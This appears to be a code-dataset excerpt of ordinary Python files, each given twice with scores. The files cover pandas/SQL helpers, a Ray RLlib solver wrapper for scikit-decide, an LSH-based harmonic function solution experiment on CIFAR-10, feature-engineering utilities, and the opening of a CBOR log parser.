list_of_dfs = [item for item in vars if (item.find('df') == 0 and item.find('_') == -1 and item != 'dfs')]
list_of_dfs.sort(key=lambda x:int(re.sub("[^0-9]", "", x.replace('df',''))) if len(x) > 2 else 0, reverse=True)
return list_of_dfs
def e(start_time):
"""Return human readable time delta
@start_time time to compare to current time
"""
print(f'Time now: {datetime.datetime.now().strftime("%Y-%m-%d %H:%M")}')
print(f"Time since start: {humanize.naturaldelta(time.monotonic() - start_time)}")
def execute(sql):
"""Execute a SQL command"""
start_time = time.monotonic()
_ = cur.execute(sql)
end_time = time.monotonic()
elapsed = end_time - start_time
print(f"Elapsed time {elapsed:.2f}")
return
def find_col_with(df, char_to_find):
"""Return column index of first column containing char_to_find
@char_to_find character to search for in column name
"""
first_column_with_char_to_find = [col for col in df.columns if col.find(char_to_find) > -1][0]
return list(df.columns).index(first_column_with_char_to_find)
def find_max_order(df, start_col=1):
"""Find the max value in each column and use it to put columns in rank order
@start_col Index of starting column (typically 1 as first column -- column 0 -- is a date or label)
"""
return list(df[df.columns[start_col:]].max().sort_values(ascending=False).keys())
def find_percentage_total(df, start_col=1):
"""Find total and percent of total for columns of Pandas dataframe
@start_col Index of starting column (typically 1 as first column -- column 0 -- is a date or label)
"""
# Get values for col1,col2 and col3
total = pd.Series(data=np.zeros(len(df)))
col_count = len(df.columns)
for i in range(start_col, col_count):
total += df.iloc[:,i]
df.insert(len(df.columns), 'total', total)
for i in range(start_col, col_count + 1):
pct_of_total = round((df.iloc[:,i]/total)*100, 2)
# Create Pandas DF with new column of pct_of_total
df.insert(len(df.columns),f"{df.columns[i]} %", pct_of_total)
# Pull original dataframe to show total and %
return df
def query(sql):
"""Run a SQL query and fetch result into Pandas DataFrame"""
start_time = time.monotonic()
_ = cur.execute(sql)
df = cur.fetch_pandas_all()
end_time = time.monotonic()
elapsed = end_time - start_time
print(f"Elapsed time {elapsed:.2f}")
return df
def t(title_string):
"""Add "as at {today}" to title. Usage: t(title_sting)
@title_string text to preceed the "as at" part
"""
today = datetime.datetime.today().strftime('%d %b %Y')
title = f"{title_string} as at {today}"
print(title)
pyperclip.copy(title)
print("(now on clipboard)")
return title
start_time = time.monotonic()
print(f"Setup Complete v {VERSION}") | 0.474144 | 0.2438 |
from __future__ import annotations
import glob
import os
from typing import Callable, Dict, Optional, Type
import ray
from ray.rllib.agents.trainer import Trainer
from ray.rllib.env.multi_agent_env import MultiAgentEnv
from ray.tune.registry import register_env
from skdecide import Domain, Solver
from skdecide.builders.domain import (
Initializable,
Sequential,
SingleAgent,
UnrestrictedActions,
)
from skdecide.builders.solver import Policies, Restorable
from skdecide.hub.space.gym import GymSpace
# TODO: remove UnrestrictedActions?
class D(Domain, Sequential, UnrestrictedActions, Initializable):
pass
class RayRLlib(Solver, Policies, Restorable):
"""This class wraps a Ray RLlib solver (ray[rllib]) as a scikit-decide solver.
!!! warning
Using this class requires Ray RLlib to be installed.
"""
T_domain = D
def __init__(
self,
algo_class: Type[Trainer],
train_iterations: int,
config: Optional[Dict] = None,
policy_configs: Dict[str, Dict] = {"policy": {}},
policy_mapping_fn: Callable[[str], str] = lambda agent_id: "policy",
) -> None:
"""Initialize Ray RLlib.
# Parameters
algo_class: The class of Ray RLlib trainer/agent to wrap.
train_iterations: The number of iterations to call the trainer's train() method.
config: The configuration dictionary for the trainer.
policy_configs: The mapping from policy id (str) to additional config (dict) (leave default for single policy).
policy_mapping_fn: The function mapping agent ids to policy ids (leave default for single policy).
"""
self._algo_class = algo_class
self._train_iterations = train_iterations
self._config = config or {}
self._policy_configs = policy_configs
self._policy_mapping_fn = policy_mapping_fn
ray.init(ignore_reinit_error=True)
@classmethod
def _check_domain_additional(cls, domain: Domain) -> bool:
if isinstance(domain, SingleAgent):
return isinstance(domain.get_action_space(), GymSpace) and isinstance(
domain.get_observation_space(), GymSpace
)
else:
return all(
isinstance(a, GymSpace) for a in domain.get_action_space().values()
) and all(
isinstance(o, GymSpace) for o in domain.get_observation_space().values()
)
def _solve_domain(self, domain_factory: Callable[[], D]) -> None:
# Reuse algo if possible (enables further learning)
if not hasattr(self, "_algo"):
self._init_algo(domain_factory)
# Training loop
for _ in range(self._train_iterations):
self._algo.train()
def _sample_action(
self, observation: D.T_agent[D.T_observation]
) -> D.T_agent[D.T_concurrency[D.T_event]]:
action = {
k: self._algo.compute_action(
self._unwrap_obs(v, k), policy_id=self._policy_mapping_fn(k)
)
for k, v in observation.items()
}
return self._wrap_action(action)
def _is_policy_defined_for(self, observation: D.T_agent[D.T_observation]) -> bool:
return True
def _save(self, path: str) -> None:
self._algo.save(path)
def _load(self, path: str, domain_factory: Callable[[], D]):
if not os.path.isfile(path):
# Find latest checkpoint
metadata_files = glob.glob(f"{path}/**/*.tune_metadata")
latest_metadata_file = max(metadata_files, key=os.path.getctime)
path = latest_metadata_file[: -len(".tune_metadata")]
self._init_algo(domain_factory)
self._algo.restore(path)
def _init_algo(self, domain_factory: Callable[[], D]):
domain = domain_factory()
self._wrap_action = lambda a: {
k: next(iter(domain.get_action_space()[k].from_unwrapped([v])))
for k, v in a.items()
}
self._unwrap_obs = lambda o, agent: next(
iter(domain.get_observation_space()[agent].to_unwrapped([o]))
)
# Overwrite multi-agent config
pol_obs_spaces = {
self._policy_mapping_fn(k): v.unwrapped()
for k, v in domain.get_observation_space().items()
}
pol_act_spaces = {
self._policy_mapping_fn(k): v.unwrapped()
for k, v in domain.get_action_space().items()
}
policies = {
k: (None, pol_obs_spaces[k], pol_act_spaces[k], v or {})
for k, v in self._policy_configs.items()
}
self._config["multiagent"] = {
"policies": policies,
"policy_mapping_fn": self._policy_mapping_fn,
}
# Instanciate algo
register_env("skdecide_env", lambda _: AsRLlibMultiAgentEnv(domain_factory()))
self._algo = self._algo_class(env="skdecide_env", config=self._config)
class AsRLlibMultiAgentEnv(MultiAgentEnv):
def __init__(self, domain: D) -> None:
"""Initialize AsRLlibMultiAgentEnv.
# Parameters
domain: The scikit-decide domain to wrap as a RLlib multi-agent environment.
"""
self._domain = domain
def reset(self):
"""Resets the env and returns observations from ready agents.
# Returns
obs (dict): New observations for each ready agent.
"""
raw_observation = self._domain.reset()
observation = {
k: next(iter(self._domain.get_observation_space()[k].to_unwrapped([v])))
for k, v in raw_observation.items()
}
return observation
def step(self, action_dict):
"""Returns observations from ready agents.
The returns are dicts mapping from agent_id strings to values. The
number of agents in the env can vary over time.
# Returns
obs (dict): New observations for each ready agent.
rewards (dict): Reward values for each ready agent. If the episode is just started, the value will be None.
dones (dict): Done values for each ready agent. The special key "__all__" (required) is used to indicate env
termination.
infos (dict): Optional info values for each agent id.
"""
action = {
k: next(iter(self._domain.get_action_space()[k].from_unwrapped([v])))
for k, v in action_dict.items()
}
outcome = self._domain.step(action)
observations = {
k: next(iter(self._domain.get_observation_space()[k].to_unwrapped([v])))
for k, v in outcome.observation.items()
}
rewards = {k: v.reward for k, v in outcome.value.items()}
done = {"__all__": outcome.termination}
infos = {k: (v or {}) for k, v in outcome.info.items()}
return observations, rewards, done, infos
def unwrapped(self):
"""Unwrap the scikit-decide domain and return it.
# Returns
The original scikit-decide domain.
"""
return self._domain
if __name__ == "__main__":
from ray.rllib.agents.ppo import PPOTrainer
from skdecide.hub.domain.rock_paper_scissors import RockPaperScissors
from skdecide.utils import rollout
domain_factory = lambda: RockPaperScissors()
domain = domain_factory()
if RayRLlib.check_domain(domain):
solver_factory = lambda: RayRLlib(
PPOTrainer, train_iterations=1, config={"framework": "torch"}
)
solver = RockPaperScissors.solve_with(solver_factory, domain_factory)
rollout(
domain,
solver,
action_formatter=lambda a: str({k: v.name for k, v in a.items()}),
outcome_formatter=lambda o: f"{ {k: v.name for k, v in o.observation.items()} }"
f" - rewards: { {k: v.reward for k, v in o.value.items()} }",
) | skdecide/hub/solver/ray_rllib/ray_rllib.py |
from __future__ import annotations
import glob
import os
from typing import Callable, Dict, Optional, Type
import ray
from ray.rllib.agents.trainer import Trainer
from ray.rllib.env.multi_agent_env import MultiAgentEnv
from ray.tune.registry import register_env
from skdecide import Domain, Solver
from skdecide.builders.domain import (
Initializable,
Sequential,
SingleAgent,
UnrestrictedActions,
)
from skdecide.builders.solver import Policies, Restorable
from skdecide.hub.space.gym import GymSpace
# TODO: remove UnrestrictedActions?
class D(Domain, Sequential, UnrestrictedActions, Initializable):
pass
class RayRLlib(Solver, Policies, Restorable):
"""This class wraps a Ray RLlib solver (ray[rllib]) as a scikit-decide solver.
!!! warning
Using this class requires Ray RLlib to be installed.
"""
T_domain = D
def __init__(
self,
algo_class: Type[Trainer],
train_iterations: int,
config: Optional[Dict] = None,
policy_configs: Dict[str, Dict] = {"policy": {}},
policy_mapping_fn: Callable[[str], str] = lambda agent_id: "policy",
) -> None:
"""Initialize Ray RLlib.
# Parameters
algo_class: The class of Ray RLlib trainer/agent to wrap.
train_iterations: The number of iterations to call the trainer's train() method.
config: The configuration dictionary for the trainer.
policy_configs: The mapping from policy id (str) to additional config (dict) (leave default for single policy).
policy_mapping_fn: The function mapping agent ids to policy ids (leave default for single policy).
"""
self._algo_class = algo_class
self._train_iterations = train_iterations
self._config = config or {}
self._policy_configs = policy_configs
self._policy_mapping_fn = policy_mapping_fn
ray.init(ignore_reinit_error=True)
@classmethod
def _check_domain_additional(cls, domain: Domain) -> bool:
if isinstance(domain, SingleAgent):
return isinstance(domain.get_action_space(), GymSpace) and isinstance(
domain.get_observation_space(), GymSpace
)
else:
return all(
isinstance(a, GymSpace) for a in domain.get_action_space().values()
) and all(
isinstance(o, GymSpace) for o in domain.get_observation_space().values()
)
def _solve_domain(self, domain_factory: Callable[[], D]) -> None:
# Reuse algo if possible (enables further learning)
if not hasattr(self, "_algo"):
self._init_algo(domain_factory)
# Training loop
for _ in range(self._train_iterations):
self._algo.train()
def _sample_action(
self, observation: D.T_agent[D.T_observation]
) -> D.T_agent[D.T_concurrency[D.T_event]]:
action = {
k: self._algo.compute_action(
self._unwrap_obs(v, k), policy_id=self._policy_mapping_fn(k)
)
for k, v in observation.items()
}
return self._wrap_action(action)
def _is_policy_defined_for(self, observation: D.T_agent[D.T_observation]) -> bool:
return True
def _save(self, path: str) -> None:
self._algo.save(path)
def _load(self, path: str, domain_factory: Callable[[], D]):
if not os.path.isfile(path):
# Find latest checkpoint
metadata_files = glob.glob(f"{path}/**/*.tune_metadata")
latest_metadata_file = max(metadata_files, key=os.path.getctime)
path = latest_metadata_file[: -len(".tune_metadata")]
self._init_algo(domain_factory)
self._algo.restore(path)
def _init_algo(self, domain_factory: Callable[[], D]):
domain = domain_factory()
self._wrap_action = lambda a: {
k: next(iter(domain.get_action_space()[k].from_unwrapped([v])))
for k, v in a.items()
}
self._unwrap_obs = lambda o, agent: next(
iter(domain.get_observation_space()[agent].to_unwrapped([o]))
)
# Overwrite multi-agent config
pol_obs_spaces = {
self._policy_mapping_fn(k): v.unwrapped()
for k, v in domain.get_observation_space().items()
}
pol_act_spaces = {
self._policy_mapping_fn(k): v.unwrapped()
for k, v in domain.get_action_space().items()
}
policies = {
k: (None, pol_obs_spaces[k], pol_act_spaces[k], v or {})
for k, v in self._policy_configs.items()
}
self._config["multiagent"] = {
"policies": policies,
"policy_mapping_fn": self._policy_mapping_fn,
}
# Instanciate algo
register_env("skdecide_env", lambda _: AsRLlibMultiAgentEnv(domain_factory()))
self._algo = self._algo_class(env="skdecide_env", config=self._config)
class AsRLlibMultiAgentEnv(MultiAgentEnv):
def __init__(self, domain: D) -> None:
"""Initialize AsRLlibMultiAgentEnv.
# Parameters
domain: The scikit-decide domain to wrap as a RLlib multi-agent environment.
"""
self._domain = domain
def reset(self):
"""Resets the env and returns observations from ready agents.
# Returns
obs (dict): New observations for each ready agent.
"""
raw_observation = self._domain.reset()
observation = {
k: next(iter(self._domain.get_observation_space()[k].to_unwrapped([v])))
for k, v in raw_observation.items()
}
return observation
def step(self, action_dict):
"""Returns observations from ready agents.
The returns are dicts mapping from agent_id strings to values. The
number of agents in the env can vary over time.
# Returns
obs (dict): New observations for each ready agent.
rewards (dict): Reward values for each ready agent. If the episode is just started, the value will be None.
dones (dict): Done values for each ready agent. The special key "__all__" (required) is used to indicate env
termination.
infos (dict): Optional info values for each agent id.
"""
action = {
k: next(iter(self._domain.get_action_space()[k].from_unwrapped([v])))
for k, v in action_dict.items()
}
outcome = self._domain.step(action)
observations = {
k: next(iter(self._domain.get_observation_space()[k].to_unwrapped([v])))
for k, v in outcome.observation.items()
}
rewards = {k: v.reward for k, v in outcome.value.items()}
done = {"__all__": outcome.termination}
infos = {k: (v or {}) for k, v in outcome.info.items()}
return observations, rewards, done, infos
def unwrapped(self):
"""Unwrap the scikit-decide domain and return it.
# Returns
The original scikit-decide domain.
"""
return self._domain
if __name__ == "__main__":
from ray.rllib.agents.ppo import PPOTrainer
from skdecide.hub.domain.rock_paper_scissors import RockPaperScissors
from skdecide.utils import rollout
domain_factory = lambda: RockPaperScissors()
domain = domain_factory()
if RayRLlib.check_domain(domain):
solver_factory = lambda: RayRLlib(
PPOTrainer, train_iterations=1, config={"framework": "torch"}
)
solver = RockPaperScissors.solve_with(solver_factory, domain_factory)
rollout(
domain,
solver,
action_formatter=lambda a: str({k: v.name for k, v in a.items()}),
outcome_formatter=lambda o: f"{ {k: v.name for k, v in o.observation.items()} }"
f" - rewards: { {k: v.reward for k, v in o.value.items()} }",
) | 0.836955 | 0.240869 |
import numpy as np
import _pickle as cPickle
import matplotlib.pyplot as plt
from scipy.spatial.distance import cdist
from sklearn.preprocessing import OneHotEncoder
from sklearn.neighbors import NearestNeighbors
import scipy.sparse
import scipy.sparse.linalg
from sklearn.decomposition import PCA
import math
import nearpy
plt.style.use('ggplot')
def unpickle(file):
fo = open(file, 'rb')
data = cPickle.load(fo, encoding='latin1')
fo.close()
return data
def mask(n, p):
# n - number of samples
# p - probability of masking a label
# randomly choose which labels to mask
return np.array(np.random.rand(n,1) < p, dtype=np.int32)
def build_knn_graph(similarities, k):
weights = np.zeros(similarities.shape)
for l in range(k):
idx = np.argmax(similarities, axis = 1)
for i,j in enumerate(idx):
weights[i,j] = weights[j,i] = similarities[i,j]
similarities[i,j] = similarities[j,i] = 0
return weights
def gaussian_similarity(distance, sigma):
return np.exp(-distance*distance / (2*sigma**2))
def get_similarities(weights):
row, col, distances = scipy.sparse.find(weights)
similarities = gaussian_similarity(distances, sigma)
return scipy.sparse.coo_matrix((similarities, (row, col)), shape=weights.shape)
def get_laplacian(weights):
return scipy.sparse.diags(np.squeeze(np.array(weights.sum(axis=1))), 0) - weights
def get_approximate_neighbors(query, data, engines_list, k):
# k - number of neighbors
L = len(engines_list)
neighbors = []
distances = []
idxs = np.zeros(L, dtype=np.int32)
candidate_indexes = set()
for l in range(L):
bucket = engines_list[l].neighbours(query)
candidate_indexes = candidate_indexes.union({el[1] for el in bucket})
candidate_indexes = list(candidate_indexes)
candidates = data[candidate_indexes,:]
distances, neighbors = NearestNeighbors(n_neighbors=k, algorithm='ball_tree').fit(candidates).kneighbors(query.reshape([1,-1]))
return neighbors.squeeze(), distances.squeeze()
def build_approx_graph(data, k, L, projection_count=20):
n, d = data.shape
engine =[]
for l in range(L):
engine.append(nearpy.Engine(d, lshashes=[ nearpy.hashes.RandomBinaryProjectionTree('rbp',projection_count, k+1) ],
distance=nearpy.distances.EuclideanDistance()))
for i in range(n):
for l in range(L):
engine[l].store_vector(data[i,:], i)
weights = scipy.sparse.dok_matrix((n,n), dtype=np.float32)
for i in range(n):
neighbors, distances = get_approximate_neighbors(data[i,:], data, engine, k+1)
neighbors = neighbors[1:] # get rid of the first neighbor that is a query itself
distances = distances[1:]
for j in range(k):
weights[i,neighbors[j]] = distances[j]
weights[neighbors[j],i] = distances[j]
return weights
def build_graph(data, k):
n, d = data.shape
#knn = NearestNeighbors(n_neighbors=k+1, algorithm='ball_tree').fit(data)
all_distances, all_neighbors = NearestNeighbors(n_neighbors=k+1, algorithm='ball_tree').fit(data).kneighbors(data)
weights = scipy.sparse.dok_matrix((n,n), dtype=np.float32)
for i in range(n):
neighbors = all_neighbors[i,1:] # get rid of the first neighbor that is a query itself
distances = all_distances[i,1:]
for j in range(k):
weights[i,neighbors[j]] = distances[j]
weights[neighbors[j],i] = distances[j]
return weights
def solve_HFS(laplacian, c_u, c_l, gamma_g, y):
C_inv_array = np.array(1./c_u*(y[:,0]==0) + 1./c_l*(y[:,0]!=0), dtype=np.float32)
C_inv = scipy.sparse.diags(C_inv_array, 0)
Q = laplacian + gamma_g*scipy.sparse.eye(n)
return scipy.sparse.linalg.spsolve(C_inv.dot(Q) + scipy.sparse.eye(n), y)
def HFS(data, y, k, gamma_g, sigma, c_u, c_l, approx=False, L=5, projection_count=20, laplacian = None):
if not approx:
weights = build_graph(data, k)
else:
weights = build_approx_graph(data, k, L, projection_count)
weights = get_similarities(weights)
laplacian = get_laplacian(weights)
return solve_HFS(laplacian, c_u,c_l, gamma_g,y), laplacian
if __name__ == '__main__':
# Reading data
data = []
labels = []
for i in range(5):
batch = unpickle('./cifar-10-batches-py/data_batch_%d' % (i+1))
data.append(batch['data'])
labels.append(np.array(batch['labels']))
data = np.concatenate(data, axis=0)
labels = np.concatenate(labels, axis=0)
labels = OneHotEncoder(sparse=False).fit_transform(labels.reshape([-1,1]))
labels = 2*labels-1
n = 5000 # number of samples
p = 0.1 # probability of unmasking a label
idxs = np.random.permutation(np.arange(data.shape[0]))[:n]
data = data[idxs,:]
labels = labels[idxs]
_mask = mask(n, p)
y = labels*_mask # masked labels
n_l = np.sum(_mask)
dimension = 100
pca = PCA(n_components=100)
data = pca.fit_transform(data)
k = 10
sigma = 1000.
gamma_g = math.sqrt(n_l**3)
c_u = 1
c_l = 1
L = 5
l, laplacian = HFS(data, y, k, gamma_g, sigma, c_u, c_l, approx=False)
l_error = []
laplacian_error = []
for L in range(2,50,2):
print('L = %d' % L)
l_approx, laplacian_approx = HFS(data, y, k, gamma_g, sigma, c_u, c_l, approx=True, L = L)
l_error.append(np.sum((l_approx - l)**2))
laplacian_error.append(scipy.sparse.linalg.norm(laplacian-laplacian_approx, ord='fro'))
np.savetxt('l_error_L.txt', np.array(l_error, dtype=np.float32))
np.savetxt('laplacian_error_L.txt', np.array(l_error, dtype=np.float32))
plt.figure()
plt.plot(l_error)
plt.show()
plt.figure()
plt.plot(laplacian_error)
plt.show()
laplacian = get_laplacian(get_similarities(build_graph(data, k)))
laplacian_approx = get_similarities(get_similarities(build_approx_graph(data, k, L=15)))
error = []
for gamma_g in range(1,1000, 10):
print('gamma_g = %f' % gamma_g)
l = solve_HFS(laplacian, c_u, c_l, gamma_g, y)
l_approx = solve_HFS(laplacian_approx, c_u, c_l, gamma_g, y)
error.append(np.sum((l_approx - l)**2))
np.savetxt('l_error_gamma_g.txt', np.array(error, dtype=np.float32))
plt.figure()
plt.plot(np.array(error))
plt.plot(2576*np.power(1./np.arange(1,1000,1), 4))
plt.show() | lsh_hfs.py | import numpy as np
import _pickle as cPickle
import matplotlib.pyplot as plt
from scipy.spatial.distance import cdist
from sklearn.preprocessing import OneHotEncoder
from sklearn.neighbors import NearestNeighbors
import scipy.sparse
import scipy.sparse.linalg
from sklearn.decomposition import PCA
import math
import nearpy
plt.style.use('ggplot')
def unpickle(file):
fo = open(file, 'rb')
data = cPickle.load(fo, encoding='latin1')
fo.close()
return data
def mask(n, p):
# n - number of samples
# p - probability of masking a label
# randomly choose which labels to mask
return np.array(np.random.rand(n,1) < p, dtype=np.int32)
def build_knn_graph(similarities, k):
weights = np.zeros(similarities.shape)
for l in range(k):
idx = np.argmax(similarities, axis = 1)
for i,j in enumerate(idx):
weights[i,j] = weights[j,i] = similarities[i,j]
similarities[i,j] = similarities[j,i] = 0
return weights
def gaussian_similarity(distance, sigma):
return np.exp(-distance*distance / (2*sigma**2))
def get_similarities(weights):
row, col, distances = scipy.sparse.find(weights)
similarities = gaussian_similarity(distances, sigma)
return scipy.sparse.coo_matrix((similarities, (row, col)), shape=weights.shape)
def get_laplacian(weights):
return scipy.sparse.diags(np.squeeze(np.array(weights.sum(axis=1))), 0) - weights
def get_approximate_neighbors(query, data, engines_list, k):
# k - number of neighbors
L = len(engines_list)
neighbors = []
distances = []
idxs = np.zeros(L, dtype=np.int32)
candidate_indexes = set()
for l in range(L):
bucket = engines_list[l].neighbours(query)
candidate_indexes = candidate_indexes.union({el[1] for el in bucket})
candidate_indexes = list(candidate_indexes)
candidates = data[candidate_indexes,:]
distances, neighbors = NearestNeighbors(n_neighbors=k, algorithm='ball_tree').fit(candidates).kneighbors(query.reshape([1,-1]))
return neighbors.squeeze(), distances.squeeze()
def build_approx_graph(data, k, L, projection_count=20):
n, d = data.shape
engine =[]
for l in range(L):
engine.append(nearpy.Engine(d, lshashes=[ nearpy.hashes.RandomBinaryProjectionTree('rbp',projection_count, k+1) ],
distance=nearpy.distances.EuclideanDistance()))
for i in range(n):
for l in range(L):
engine[l].store_vector(data[i,:], i)
weights = scipy.sparse.dok_matrix((n,n), dtype=np.float32)
for i in range(n):
neighbors, distances = get_approximate_neighbors(data[i,:], data, engine, k+1)
neighbors = neighbors[1:] # get rid of the first neighbor that is a query itself
distances = distances[1:]
for j in range(k):
weights[i,neighbors[j]] = distances[j]
weights[neighbors[j],i] = distances[j]
return weights
def build_graph(data, k):
n, d = data.shape
#knn = NearestNeighbors(n_neighbors=k+1, algorithm='ball_tree').fit(data)
all_distances, all_neighbors = NearestNeighbors(n_neighbors=k+1, algorithm='ball_tree').fit(data).kneighbors(data)
weights = scipy.sparse.dok_matrix((n,n), dtype=np.float32)
for i in range(n):
neighbors = all_neighbors[i,1:] # get rid of the first neighbor that is a query itself
distances = all_distances[i,1:]
for j in range(k):
weights[i,neighbors[j]] = distances[j]
weights[neighbors[j],i] = distances[j]
return weights
def solve_HFS(laplacian, c_u, c_l, gamma_g, y):
C_inv_array = np.array(1./c_u*(y[:,0]==0) + 1./c_l*(y[:,0]!=0), dtype=np.float32)
C_inv = scipy.sparse.diags(C_inv_array, 0)
Q = laplacian + gamma_g*scipy.sparse.eye(n)
return scipy.sparse.linalg.spsolve(C_inv.dot(Q) + scipy.sparse.eye(n), y)
def HFS(data, y, k, gamma_g, sigma, c_u, c_l, approx=False, L=5, projection_count=20, laplacian = None):
if not approx:
weights = build_graph(data, k)
else:
weights = build_approx_graph(data, k, L, projection_count)
weights = get_similarities(weights)
laplacian = get_laplacian(weights)
return solve_HFS(laplacian, c_u,c_l, gamma_g,y), laplacian
if __name__ == '__main__':
# Reading data
data = []
labels = []
for i in range(5):
batch = unpickle('./cifar-10-batches-py/data_batch_%d' % (i+1))
data.append(batch['data'])
labels.append(np.array(batch['labels']))
data = np.concatenate(data, axis=0)
labels = np.concatenate(labels, axis=0)
labels = OneHotEncoder(sparse=False).fit_transform(labels.reshape([-1,1]))
labels = 2*labels-1
n = 5000 # number of samples
p = 0.1 # probability of unmasking a label
idxs = np.random.permutation(np.arange(data.shape[0]))[:n]
data = data[idxs,:]
labels = labels[idxs]
_mask = mask(n, p)
y = labels*_mask # masked labels
n_l = np.sum(_mask)
dimension = 100
pca = PCA(n_components=100)
data = pca.fit_transform(data)
k = 10
sigma = 1000.
gamma_g = math.sqrt(n_l**3)
c_u = 1
c_l = 1
L = 5
l, laplacian = HFS(data, y, k, gamma_g, sigma, c_u, c_l, approx=False)
l_error = []
laplacian_error = []
for L in range(2,50,2):
print('L = %d' % L)
l_approx, laplacian_approx = HFS(data, y, k, gamma_g, sigma, c_u, c_l, approx=True, L = L)
l_error.append(np.sum((l_approx - l)**2))
laplacian_error.append(scipy.sparse.linalg.norm(laplacian-laplacian_approx, ord='fro'))
np.savetxt('l_error_L.txt', np.array(l_error, dtype=np.float32))
np.savetxt('laplacian_error_L.txt', np.array(l_error, dtype=np.float32))
plt.figure()
plt.plot(l_error)
plt.show()
plt.figure()
plt.plot(laplacian_error)
plt.show()
laplacian = get_laplacian(get_similarities(build_graph(data, k)))
laplacian_approx = get_similarities(get_similarities(build_approx_graph(data, k, L=15)))
error = []
for gamma_g in range(1,1000, 10):
print('gamma_g = %f' % gamma_g)
l = solve_HFS(laplacian, c_u, c_l, gamma_g, y)
l_approx = solve_HFS(laplacian_approx, c_u, c_l, gamma_g, y)
error.append(np.sum((l_approx - l)**2))
np.savetxt('l_error_gamma_g.txt', np.array(error, dtype=np.float32))
plt.figure()
plt.plot(np.array(error))
plt.plot(2576*np.power(1./np.arange(1,1000,1), 4))
plt.show() | 0.598312 | 0.476823 |
import os
import pandas as pd
import numpy as np
from hydra import utils
import itertools
from sklearn import preprocessing
class FeatureFactory:
def __init__(self, configs: dict, cv=None):
self.run_name = configs['exp_name']
self.data = configs.data
self.coldef = self.data.cols_definition
self.fe = configs.fe
self.cv = cv
def create(self):
print('Load data')
for f in self.fe:
print(f)
utils.instantiate(f)
def load_data(train_csv, test_csv):
print('Load Data')
feature_name = "features/train_test.ftr"
feature_abs_path = utils.to_absolute_path(feature_name)
if not os.path.exists(feature_abs_path):
train_df = pd.read_csv(utils.to_absolute_path(train_csv))
test_df = pd.read_csv(utils.to_absolute_path(test_csv))
pd.concat([
train_df, test_df,
], sort=False).reset_index(drop=True).to_feather(feature_abs_path)
print(pd.read_feather(feature_abs_path).head())
def numeric_interact_2order(target_col, input_feature):
print('Numeric Interact 2nd Order')
df = pd.read_feather(utils.to_absolute_path(input_feature))
org_cols = df.columns.values
feature_name = "features/numeric_interact_2order.ftr"
feature_abs_path = utils.to_absolute_path(feature_name)
if not os.path.exists(feature_abs_path):
for col1, col2 in list(itertools.combinations(target_col, 2)):
df[f'{col1}_plus_{col2}'] = df[col1] + df[col2]
df[f'{col1}_mul_{col2}'] = df[col1] * df[col2]
df[f'{col1}_sub_{col2}'] = df[col1] - df[col2]
try:
df[f'{col1}_div_{col2}'] = df[col1] / df[col2]
except:
print(f'{col1}_div_{col2}')
df.drop(org_cols, axis=1).reset_index(drop=True).to_feather(feature_abs_path)
print(pd.read_feather(feature_abs_path).head())
def label_encoding(target_col, input_feature):
print('Label Encoding')
df = pd.read_feather(utils.to_absolute_path(input_feature))
org_cols = df.columns.values
feature_name = "features/label_encoding.ftr"
feature_abs_path = utils.to_absolute_path(feature_name)
if not os.path.exists(feature_abs_path):
for f in target_col:
try:
lbl = preprocessing.LabelEncoder()
df[f'{f}_lbl_encoded'] = lbl.fit_transform(list(df[f].values))
except:
print(f)
df.drop(org_cols, axis=1).reset_index(drop=True).to_feather(feature_abs_path)
print(pd.read_feather(feature_abs_path).head()) | src/speeder/feature/feature_utils.py | import os
import pandas as pd
import numpy as np
from hydra import utils
import itertools
from sklearn import preprocessing
class FeatureFactory:
def __init__(self, configs: dict, cv=None):
self.run_name = configs['exp_name']
self.data = configs.data
self.coldef = self.data.cols_definition
self.fe = configs.fe
self.cv = cv
def create(self):
print('Load data')
for f in self.fe:
print(f)
utils.instantiate(f)
def load_data(train_csv, test_csv):
print('Load Data')
feature_name = "features/train_test.ftr"
feature_abs_path = utils.to_absolute_path(feature_name)
if not os.path.exists(feature_abs_path):
train_df = pd.read_csv(utils.to_absolute_path(train_csv))
test_df = pd.read_csv(utils.to_absolute_path(test_csv))
pd.concat([
train_df, test_df,
], sort=False).reset_index(drop=True).to_feather(feature_abs_path)
print(pd.read_feather(feature_abs_path).head())
def numeric_interact_2order(target_col, input_feature):
print('Numeric Interact 2nd Order')
df = pd.read_feather(utils.to_absolute_path(input_feature))
org_cols = df.columns.values
feature_name = "features/numeric_interact_2order.ftr"
feature_abs_path = utils.to_absolute_path(feature_name)
if not os.path.exists(feature_abs_path):
for col1, col2 in list(itertools.combinations(target_col, 2)):
df[f'{col1}_plus_{col2}'] = df[col1] + df[col2]
df[f'{col1}_mul_{col2}'] = df[col1] * df[col2]
df[f'{col1}_sub_{col2}'] = df[col1] - df[col2]
try:
df[f'{col1}_div_{col2}'] = df[col1] / df[col2]
except:
print(f'{col1}_div_{col2}')
df.drop(org_cols, axis=1).reset_index(drop=True).to_feather(feature_abs_path)
print(pd.read_feather(feature_abs_path).head())
def label_encoding(target_col, input_feature):
print('Label Encoding')
df = pd.read_feather(utils.to_absolute_path(input_feature))
org_cols = df.columns.values
feature_name = "features/label_encoding.ftr"
feature_abs_path = utils.to_absolute_path(feature_name)
if not os.path.exists(feature_abs_path):
for f in target_col:
try:
lbl = preprocessing.LabelEncoder()
df[f'{f}_lbl_encoded'] = lbl.fit_transform(list(df[f].values))
except:
print(f)
df.drop(org_cols, axis=1).reset_index(drop=True).to_feather(feature_abs_path)
print(pd.read_feather(feature_abs_path).head()) | 0.253584 | 0.295654 |
from __future__ import print_function
import cbor
import argparse
import datetime
import time
import pprint
import collections
import logging
logr = logging.getLogger( __name__ )
default_dirdata = { 'start': 0,
'num_src_dirs': 0,
'num_src_files': 0,
'num_tgt_dirs': 0,
'num_tgt_files': 0,
'srctot': 0,
'end': 0,
'elapsed': 999999,
}
def process_cmdline():
parser = argparse.ArgumentParser()
parser.add_argument( 'infile' )
parser.add_argument( '--inodes', '-i', type=int, metavar='N',
help='Source file system has N inodes total. '
'Used to estimate completion progress.' )
default_options = {
'inodes': 220531082,
}
parser.set_defaults( **default_options )
args = parser.parse_args()
return args
def process_start_end_times( rec, time_data ):
newts = rec[ 'ts' ]
if newts < time_data[ 'start_ts' ]:
time_data[ 'start_ts' ] = newts
elif newts > time_data[ 'end_ts' ]:
time_data[ 'end_ts' ] = newts
def count_sync_types( rec, sync_types ):
try:
stype = rec[ 'synctype' ]
except( KeyError ) as e:
logr.warning( "No synctype in record: {0}".format( rec ) )
return
mtype = 'None'
try:
mtype = rec[ 'msgtype' ]
except ( KeyError ) as e:
pass
if stype not in sync_types:
sync_types[ stype ] = {}
sdata = sync_types[ stype ]
if mtype not in sdata:
